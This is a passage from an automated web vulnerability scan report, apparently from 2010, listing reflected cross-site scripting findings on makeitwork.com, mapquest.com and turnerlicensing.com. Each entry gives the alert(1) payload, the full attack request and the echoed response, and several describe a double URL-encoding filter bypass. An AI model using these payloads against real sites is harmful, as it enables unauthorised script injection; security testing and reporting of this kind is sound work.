<title>Rokboxd26ef</Title><Img Src=A Onerror=Alert(1)>D4c62d3506a System, PLUGINS. Make It Work guarantees you will be delighted!</title>
...[SNIP]...

2.153. http://www.makeitwork.com/plugins/system/rokbox/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.makeitwork.com
Path:   /plugins/system/rokbox/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 708b3"><img%20src%3da%20onerror%3dalert(1)>59fe09ce6a was submitted in the REST URL parameter 3. This input was echoed as 708b3"><img src=a onerror=alert(1)>59fe09ce6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /plugins/system/rokbox708b3"><img%20src%3da%20onerror%3dalert(1)>59fe09ce6a/ HTTP/1.1
Host: www.makeitwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=246358936.1290271612.1.1.utmgclid=CNTcksnsr6UCFRhg2godlBHrYA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; 8402d15662a4628733f3ad434ce06140=2na2t369v9umvdqdqv92diae06; __utma=246358936.1337497436.1290271612.1290271612.1290271612.1; __utmc=246358936; __utmb=246358936.1.10.1290271612;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:20:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 62683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...
<meta name="keywords" content="Make It Work provides the best Rokbox708b3"><Img Src=A Onerror=Alert(1)>59fe09ce6a services in System, PLUGINS. We guarantee you will be delighted! Call 877-625-3489." />
...[SNIP]...

2.154. http://www.makeitwork.com/plugins/system/rokbox/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.makeitwork.com
Path:   /plugins/system/rokbox/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 93329<img%20src%3da%20onerror%3dalert(1)>230708c6484 was submitted in the REST URL parameter 3. This input was echoed as 93329<img src=a onerror=alert(1)>230708c6484 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /plugins/system/rokbox93329<img%20src%3da%20onerror%3dalert(1)>230708c6484/ HTTP/1.1
Host: www.makeitwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=246358936.1290271612.1.1.utmgclid=CNTcksnsr6UCFRhg2godlBHrYA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; 8402d15662a4628733f3ad434ce06140=2na2t369v9umvdqdqv92diae06; __utma=246358936.1337497436.1290271612.1290271612.1290271612.1; __utmc=246358936; __utmb=246358936.1.10.1290271612;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:20:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 62454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...
<h1 class="title">Rokbox93329<Img Src=A Onerror=Alert(1)>230708c6484 Services in System, PLUGINS:</h1>
...[SNIP]...

2.155. http://www.mapquest.com/maps/map.adp [country parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /maps/map.adp

Issue detail

The value of the country request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28087</script><script>alert(1)</script>e99a017790b was submitted in the country parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /maps/map.adp?searchtype=address&country=28087</script><script>alert(1)</script>e99a017790b HTTP/1.1
Host: www.mapquest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession=hyPAPBbXpqCCJFqQoNaz/ue5K9M=; Domain=mapquest.com; Expires=Sat, 20-Nov-2010 18:32:40 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Sat, 20-Nov-2010 18:17:40 GMT; Path=/
Set-Cookie: psession=jnQDDuTHOg9IX67PkdpU2BI35pg=; Domain=mapquest.com; Expires=Fri, 18-Feb-2011 18:02:40 GMT; Path=/
Set-Cookie: c_Id=MjIwOjM2OQ%3D%3D; Expires=Sat, 20-Nov-2010 18:32:40 GMT; Path=/
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Sat, 20 Nov 2010 18:02:40 GMT
Content-Length: 29780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c
...[SNIP]...
tegories":null,"charFilter":null,"displayQuery":null,"inflectionPointIndex":null,"latch":false,"latchQuery":null,"locale":"en","mapState":null,"mostPopularCategory":null,"page":0,"position":0,"query":"28087</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>E99A017790B","routeContext":null,"routeSessionId":null,"searchAroundLocation":null,"searchTerm":null,"searchType":"onMap","shapePoints":null,"showDetails":false,"sortType":"relevance","total":0},"name":null,"note
...[SNIP]...

2.156. http://www.turnerlicensing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 616be%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527018d474a113 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 616be'style='x:expression(alert(1))'018d474a113 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /?616be%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527018d474a113=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId3=rnoX2q9XAatYKaJC; JSESSIONID=5FGwMyBPj2G9W1Yp7Zy2vGPjsmpGvTRLK5dLCcGL1LQd27JDFJ2hjzvGZJdq31s19kkgnxsBqmQQqJp7C24sztLlX2QJNz6JFx0xSDXrxwjDszkrLTjK3L22n5n1bXhG!-639703385; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290272830.1290272924.6; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.1.10.1290272924
Host: www.turnerlicensing.com

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:26 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 328662000:73686F702D6A6176613034302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=VJtCMyKpYCsTv7gJCDNfCpFYc2fkfz1c7ycNT5yyhpcxp2g3L0JTnvLKZ1B0pF2vjyz7TWkwwv9ZMnNMMjJhTyg6JTsGpRqwWrFRt7zybbF3Hwppyp1FMzmhKmhQKppz!-639703385; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 17:51:27 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 41613


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Homepage - Turner</title>


<meta name=...robots... content=...NOODP,NOYDIR...>
<script language='JavaScript'
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/?616be%27style%3d%27x%3aexpression%28alert%281%29%29%27018d474a113=1&616be'style='x:expression(alert(1))'018d474a113=1'>
...[SNIP]...

2.157. http://www.turnerlicensing.com/11x17_recordable_message_centers [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /11x17_recordable_message_centers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 75fdb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527768256e6a68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75fdb'style='x:expression(alert(1))'768256e6a68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /11x17_recordable_message_centers?75fdb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527768256e6a68=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:16 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1699153863:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=964
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100076


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>11x17 Recordable Message Centers</title>


<script language='JavaScript' type='text/javascript'>window.status=
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=262186&75fdb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527768256e6a68=1&75fdb'style='x:expression(alert(1))'768256e6a68=1&fromsla=T&75fdb%27style%3d%27x%3aexpression%28alert%281%29%29%27768256e6a68=1'>
...[SNIP]...

2.158. http://www.turnerlicensing.com/11x17_sound_message_centers [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /11x17_sound_message_centers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4cc6b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eea3ebc05ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4cc6b'style='x:expression(alert(1))'eea3ebc05ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /11x17_sound_message_centers?4cc6b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eea3ebc05ed=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:18 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -109265876:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=926
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100288


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>11x17 Sound Message Centers</title>


<script language='JavaScript' type='text/javascript'>window.status='Load
...[SNIP]...
erlicensing.com/s.nl?category=175948&4cc6b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eea3ebc05ed=1&4cc6b%27style%3d%27x%3aexpression%28alert%281%29%29%27eea3ebc05ed=1&fromsla=T&4cc6b'style='x:expression(alert(1))'eea3ebc05ed=1'>
...[SNIP]...

2.159. http://www.turnerlicensing.com/2_year_planners [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /2_year_planners

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 59479%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527789fbd98f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 59479'style='x:expression(alert(1))'789fbd98f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /2_year_planners?59479%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527789fbd98f9=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:17 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 778535204:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=993
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 99347


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>2 Year Planners</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</sc
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=730809&59479%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527789fbd98f9=1&59479'style='x:expression(alert(1))'789fbd98f9=1&59479%27style%3d%27x%3aexpression%28alert%281%29%29%27789fbd98f9=1&fromsla=T'>
...[SNIP]...

2.160. http://www.turnerlicensing.com/3_ring_binders [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /3_ring_binders

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 83686%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731528bb40bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 83686'style='x:expression(alert(1))'31528bb40bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /3_ring_binders?83686%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731528bb40bd=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:15 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1666335954:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=861
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 76372


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>3-Ring Binders</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scr
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175952&83686%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731528bb40bd=1&83686'style='x:expression(alert(1))'31528bb40bd=1&fromsla=T&83686%27style%3d%27x%3aexpression%28alert%281%29%29%2731528bb40bd=1'>
...[SNIP]...

2.161. http://www.turnerlicensing.com/3_subject_notebooks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /3_subject_notebooks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f63ec%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275164698b3fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f63ec'style='x:expression(alert(1))'5164698b3fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /3_subject_notebooks?f63ec%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275164698b3fe=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:19 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1114181783:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=963
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 99744


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>3 Subject Notebooks</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=262132&f63ec%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275164698b3fe=1&f63ec'style='x:expression(alert(1))'5164698b3fe=1&f63ec%27style%3d%27x%3aexpression%28alert%281%29%29%275164698b3fe=1&fromsla=T'>
...[SNIP]...

2.162. http://www.turnerlicensing.com/5x8_notepads [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /5x8_notepads

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1bbd7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273ded6a6acc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1bbd7'style='x:expression(alert(1))'3ded6a6acc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /5x8_notepads?1bbd7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273ded6a6acc=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:21 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1558082987:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=967
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100309


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>5x8 Notepads</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scrip
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175950&1bbd7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273ded6a6acc=1&1bbd7'style='x:expression(alert(1))'3ded6a6acc=1&1bbd7%27style%3d%27x%3aexpression%28alert%281%29%29%273ded6a6acc=1&fromsla=T'>
...[SNIP]...

2.163. http://www.turnerlicensing.com/5x8_planners [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /5x8_planners

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dec49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b65b930df92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dec49'style='x:expression(alert(1))'b65b930df92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /5x8_planners?dec49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b65b930df92=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
